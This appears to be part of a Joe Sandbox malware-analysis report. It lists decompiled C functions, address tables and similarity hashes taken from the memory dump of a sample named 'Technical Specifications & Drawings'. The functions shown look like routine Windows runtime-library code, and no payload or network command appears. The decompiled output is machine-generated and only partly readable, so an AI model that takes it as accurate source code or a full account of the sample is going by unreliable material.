								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x189b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18984c0;
										if(_t69 >=  *0x18984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01879063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E017A922A(_t82);
							_t53 = E017C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01878B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18986c0; // 0x12607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18986bc;
										_t72 = 0x18986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E017A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18986c4;
									_t72 = 0x18986c0;
									L18:
									E017D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                  0x017a9100
                                                  0x017a9100
                                                  0x017a9100
                                                  0x017a9100
                                                  0x017a9102
                                                  0x017a9107
                                                  0x017a910c
                                                  0x017a9110
                                                  0x017a9115
                                                  0x017a9136
                                                  0x017a9143
                                                  0x018037e4
                                                  0x018037e4
                                                  0x017a9149
                                                  0x017a914e
                                                  0x017a914e
                                                  0x017a9117
                                                  0x017a911d
                                                  0x00000000
                                                  0x00000000
                                                  0x017a911f
                                                  0x017a9125
                                                  0x00000000
                                                  0x017a9151
                                                  0x017a9158
                                                  0x017a915d
                                                  0x017a9161
                                                  0x017a9168
                                                  0x01803715
                                                  0x00000000
                                                  0x017a916e
                                                  0x017a916e
                                                  0x017a9175
                                                  0x017a9177
                                                  0x017a917e
                                                  0x017a917f
                                                  0x017a9182
                                                  0x017a9182
                                                  0x017a9187
                                                  0x017a9187
                                                  0x017a918a
                                                  0x017a918d
                                                  0x017a918f
                                                  0x017a9192
                                                  0x017a9195
                                                  0x017a9198
                                                  0x017a9198
                                                  0x017a9198
                                                  0x017a919a
                                                  0x00000000
                                                  0x00000000
                                                  0x0180371f
                                                  0x01803721
                                                  0x01803727
                                                  0x0180372f
                                                  0x01803733
                                                  0x01803735
                                                  0x01803738
                                                  0x0180373b
                                                  0x0180373d
                                                  0x01803740
                                                  0x00000000
                                                  0x00000000
                                                  0x01803746
                                                  0x01803749
                                                  0x00000000
                                                  0x00000000
                                                  0x0180374f
                                                  0x01803751
                                                  0x00000000
                                                  0x00000000
                                                  0x01803757
                                                  0x01803759
                                                  0x0180375c
                                                  0x0180375c
                                                  0x0180375e
                                                  0x0180375e
                                                  0x01803761
                                                  0x01803764
                                                  0x00000000
                                                  0x00000000
                                                  0x01803766
                                                  0x01803768
                                                  0x018037a3
                                                  0x018037a3
                                                  0x018037a5
                                                  0x018037a7
                                                  0x018037ad
                                                  0x018037b0
                                                  0x018037b2
                                                  0x018037bc
                                                  0x018037c2
                                                  0x018037c2
                                                  0x018037b2
                                                  0x017a9187
                                                  0x017a9187
                                                  0x017a918a
                                                  0x017a918d
                                                  0x017a918f
                                                  0x017a9192
                                                  0x017a9195
                                                  0x00000000
                                                  0x017a9195
                                                  0x00000000
                                                  0x017a9187
                                                  0x0180376a
                                                  0x0180376a
                                                  0x0180376c
                                                  0x0180376c
                                                  0x0180376f
                                                  0x01803775
                                                  0x00000000
                                                  0x00000000
                                                  0x01803777
                                                  0x01803779
                                                  0x00000000
                                                  0x00000000
                                                  0x01803782
                                                  0x01803787
                                                  0x01803789
                                                  0x01803790
                                                  0x01803790
                                                  0x0180378b
                                                  0x0180378b
                                                  0x0180378b
                                                  0x01803792
                                                  0x01803795
                                                  0x01803795
                                                  0x01803798
                                                  0x01803798
                                                  0x0180379b
                                                  0x0180379b
                                                  0x017a91a3
                                                  0x017a91a9
                                                  0x017a91b0
                                                  0x017a91b4
                                                  0x017a91b4
                                                  0x017a91bb
                                                  0x017a91c0
                                                  0x017a91c5
                                                  0x017a91c7
                                                  0x018037da
                                                  0x017a91cd
                                                  0x017a91cd
                                                  0x017a91cd
                                                  0x017a91d2
                                                  0x017a91d5
                                                  0x017a9239
                                                  0x017a9239
                                                  0x017a91d7
                                                  0x017a91db
                                                  0x017a91e1
                                                  0x017a91e7
                                                  0x017a91fd
                                                  0x017a9203
                                                  0x017a921e
                                                  0x017a9223
                                                  0x00000000
                                                  0x017a9223
                                                  0x017a9205
                                                  0x017a9208
                                                  0x017a920c
                                                  0x017a9214
                                                  0x017a9214
                                                  0x017a91e9
                                                  0x017a91e9
                                                  0x017a91ee
                                                  0x017a91f3
                                                  0x017a91f3
                                                  0x017a91f3
                                                  0x017a91e7
                                                  0x00000000
                                                  0x017a91db
                                                  0x017a9187
                                                  0x017a9168

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f60a3b796f7e2cce909de92ce75ae501c0b47312bc7f307d93a1bfde6f29fcc
                                                  • Instruction ID: 87cbb2b8c4f25bd9818f1ee93092cf287f542390e16208fc0d8d60b502cc51b1
                                                  • Opcode Fuzzy Hash: 1f60a3b796f7e2cce909de92ce75ae501c0b47312bc7f307d93a1bfde6f29fcc
                                                  • Instruction Fuzzy Hash: B331B571A05246DFDB26DB6CC48C7ADFBB1BBCA318F58825DC604A7241D334BA90CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D1DB5 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E017D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E017CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L017C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E017CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                  0x017d1dc2
                                                  0x017d1dc5
                                                  0x017d1dc7
                                                  0x017d1dcc
                                                  0x017d1dce
                                                  0x017d1dd6
                                                  0x017d1ddf
                                                  0x017d1de0
                                                  0x017d1de1
                                                  0x017d1de5
                                                  0x017d1de8
                                                  0x017d1def
                                                  0x017d1df0
                                                  0x017d1df6
                                                  0x017d1df7
                                                  0x017d1dfe
                                                  0x017d1e1a
                                                  0x00000000
                                                  0x00000000
                                                  0x017d1e0b
                                                  0x017d1e12
                                                  0x017d1e12
                                                  0x017d1e00
                                                  0x017d1e00
                                                  0x017d1e05
                                                  0x017d1e1e
                                                  0x017d1e23
                                                  0x0181570f
                                                  0x01815713
                                                  0x00000000
                                                  0x00000000
                                                  0x01815719
                                                  0x01815719
                                                  0x017d1e2c
                                                  0x017d1e2d
                                                  0x017d1e2e
                                                  0x017d1e2f
                                                  0x017d1e31
                                                  0x017d1e32
                                                  0x017d1e35
                                                  0x017d1e3d
                                                  0x01815723
                                                  0x0181573d
                                                  0x0181573d
                                                  0x00000000
                                                  0x01815723
                                                  0x017d1e49
                                                  0x017d1e4e
                                                  0x017d1e4e
                                                  0x017d1e09
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction ID: a861442a0026a480b6e44c1f99379954da3750f681830addb15dca732fee030f
                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                  • Instruction Fuzzy Hash: 53218E72600119EFD721CF99CC84EABFBBDEF89751F514099EA05A7210D634AE01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01826C0A Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E01826C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E017C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1897b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L017C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E017EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E017C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E017E9AE0();
						_t23 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                  0x01826c0a
                                                  0x01826c0f
                                                  0x01826c10
                                                  0x01826c13
                                                  0x01826c15
                                                  0x01826c19
                                                  0x01826c1c
                                                  0x01826c21
                                                  0x01826c28
                                                  0x01826c3a
                                                  0x01826c2a
                                                  0x01826c33
                                                  0x01826c33
                                                  0x01826c3f
                                                  0x01826c48
                                                  0x01826c4d
                                                  0x01826c60
                                                  0x01826c65
                                                  0x01826c69
                                                  0x01826c73
                                                  0x01826c79
                                                  0x01826c7f
                                                  0x01826c86
                                                  0x01826c90
                                                  0x01826c94
                                                  0x01826ca6
                                                  0x01826cb2
                                                  0x01826cbd
                                                  0x01826cbd
                                                  0x01826cc3
                                                  0x01826cc7
                                                  0x01826ccb
                                                  0x01826cd0
                                                  0x01826cd1
                                                  0x01826ce2
                                                  0x01826ce2
                                                  0x01826c69
                                                  0x01826ced

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fe7c92ce8640698f0ba0206238bc41fc8e15690983c44c0aa3c7ba77d7558f4
                                                  • Instruction ID: 37fc4a6222aba9aa2f372135c8c8a66568807ab61e88958e4ccaa87238c7f702
                                                  • Opcode Fuzzy Hash: 4fe7c92ce8640698f0ba0206238bc41fc8e15690983c44c0aa3c7ba77d7558f4
                                                  • Instruction Fuzzy Hash: 2321ADB1A00655AFD716DB68D844F2AB7B8FF48704F140069F905D7790E634EE50CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E90AF Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E017E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E017FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E017DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L017C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E017EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E017DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                  0x017e90af
                                                  0x017e90b8
                                                  0x017e90bb
                                                  0x017e90bf
                                                  0x017e90c2
                                                  0x017e90c2
                                                  0x017e90c8
                                                  0x017e90cb
                                                  0x017e90cd
                                                  0x018214d7
                                                  0x018214eb
                                                  0x018214eb
                                                  0x00000000
                                                  0x018214eb
                                                  0x018214db
                                                  0x018214e6
                                                  0x00000000
                                                  0x018214f2
                                                  0x018214e8
                                                  0x00000000
                                                  0x018214e8
                                                  0x017e90d8
                                                  0x017e90da
                                                  0x017e90dd
                                                  0x017e90e5
                                                  0x00000000
                                                  0x017e9139
                                                  0x017e90fa
                                                  0x017e90fe
                                                  0x017e9142
                                                  0x00000000
                                                  0x017e9142
                                                  0x017e9104
                                                  0x017e9107
                                                  0x017e910b
                                                  0x017e9110
                                                  0x017e9118
                                                  0x017e9147
                                                  0x017e9148
                                                  0x017e914f
                                                  0x017e9150
                                                  0x017e9151
                                                  0x017e9152
                                                  0x017e9156
                                                  0x017e915d
                                                  0x017e9160
                                                  0x017e9168
                                                  0x017e916c
                                                  0x017e91bc
                                                  0x017e91be
                                                  0x00000000
                                                  0x017e91be
                                                  0x017e916e
                                                  0x017e9173
                                                  0x017e9176
                                                  0x00000000
                                                  0x00000000
                                                  0x017e917c
                                                  0x017e9180
                                                  0x017e91b5
                                                  0x00000000
                                                  0x017e91b5
                                                  0x017e9182
                                                  0x017e9185
                                                  0x017e9189
                                                  0x00000000
                                                  0x00000000
                                                  0x017e918e
                                                  0x017e9190
                                                  0x017e9198
                                                  0x00000000
                                                  0x00000000
                                                  0x017e91a0
                                                  0x00000000
                                                  0x017e91ad
                                                  0x017e91ad
                                                  0x017e91b0
                                                  0x017e91b1
                                                  0x00000000
                                                  0x017e9185
                                                  0x017e911a
                                                  0x017e911c
                                                  0x017e911f
                                                  0x017e9125
                                                  0x017e9127
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction ID: 873fd6e6a55c0e5149bf919c9f2cc42fb2c7539b2da8b80724d48808ab3e4fac
                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction Fuzzy Hash: 4A215372A00315EFDB21DF59C848AAAFBF8EB58754F15846EEA49E7250D330ED40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D3B7A Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E017D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E017EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E017EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18984c4; // 0x0
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                  0x017d3b89
                                                  0x017d3b96
                                                  0x017d3ba1
                                                  0x017d3bab
                                                  0x017d3bb5
                                                  0x017d3bb9
                                                  0x01816298
                                                  0x017d3bbf
                                                  0x017d3bc2
                                                  0x017d3bc3
                                                  0x017d3bc9
                                                  0x017d3bca
                                                  0x017d3bcc
                                                  0x017d3bcd
                                                  0x017d3bd4
                                                  0x017d3bd6
                                                  0x017d3bdb
                                                  0x017d3bea
                                                  0x017d3bf7
                                                  0x017d3bfb
                                                  0x017d3bff
                                                  0x017d3c09
                                                  0x017d3c0a
                                                  0x017d3c0b
                                                  0x017d3c0f
                                                  0x017d3c14
                                                  0x017d3c18
                                                  0x017d3c18
                                                  0x017d3bfb
                                                  0x017d3c1b
                                                  0x017d3c30
                                                  0x017d3c30
                                                  0x017d3c3d

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                  • Instruction ID: 898a8a2ba56b854758ca1cacb20efcbe498874acdfc05f0203ae6300b7ea796c
                                                  • Opcode Fuzzy Hash: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                  • Instruction Fuzzy Hash: 072180B2600109EFC714DF58CD85B9ABBBDFB45708F190068E509AB251D771EE018B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01826CF0 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E01826CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E017C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E017C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1785c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E017DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E017DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01827016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L017C2400( &_v52);
								}
								_t21 = L017C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                  0x01826cfb
                                                  0x01826d00
                                                  0x01826d02
                                                  0x01826d06
                                                  0x01826d0a
                                                  0x01826d0e
                                                  0x01826d19
                                                  0x01826d2b
                                                  0x01826d1b
                                                  0x01826d24
                                                  0x01826d24
                                                  0x01826d33
                                                  0x01826d39
                                                  0x01826d46
                                                  0x01826d4f
                                                  0x01826d61
                                                  0x01826d51
                                                  0x01826d5a
                                                  0x01826d5a
                                                  0x01826d69
                                                  0x01826d6b
                                                  0x01826d6d
                                                  0x01826d6f
                                                  0x01826d6f
                                                  0x01826d74
                                                  0x01826d79
                                                  0x01826d7a
                                                  0x01826d7f
                                                  0x01826d82
                                                  0x01826d88
                                                  0x01826d89
                                                  0x01826d90
                                                  0x01826d94
                                                  0x01826da7
                                                  0x01826db1
                                                  0x01826db1
                                                  0x01826dbb
                                                  0x01826dbb
                                                  0x01826d90
                                                  0x01826d69
                                                  0x01826d46
                                                  0x01826dc6

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                  • Instruction ID: 5a15531773b91c4a3cefc70be28b7a8505d278e2df7a2759288f8e646f4504f5
                                                  • Opcode Fuzzy Hash: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                  • Instruction Fuzzy Hash: 712125724002899BD312DF28C948B67FBECEF91740F18045AFD40C7251EB35CA88C6A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0187070D Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E0187070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E018707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0186AFDE( &_v8,  &_v12);
					E01871293(_t38, _v28, _t60);
					if(E017C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E018614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                  0x0187071b
                                                  0x01870724
                                                  0x01870734
                                                  0x01870738
                                                  0x0187074b
                                                  0x0187074b
                                                  0x01870753
                                                  0x01870753
                                                  0x01870759
                                                  0x0187075d
                                                  0x01870774
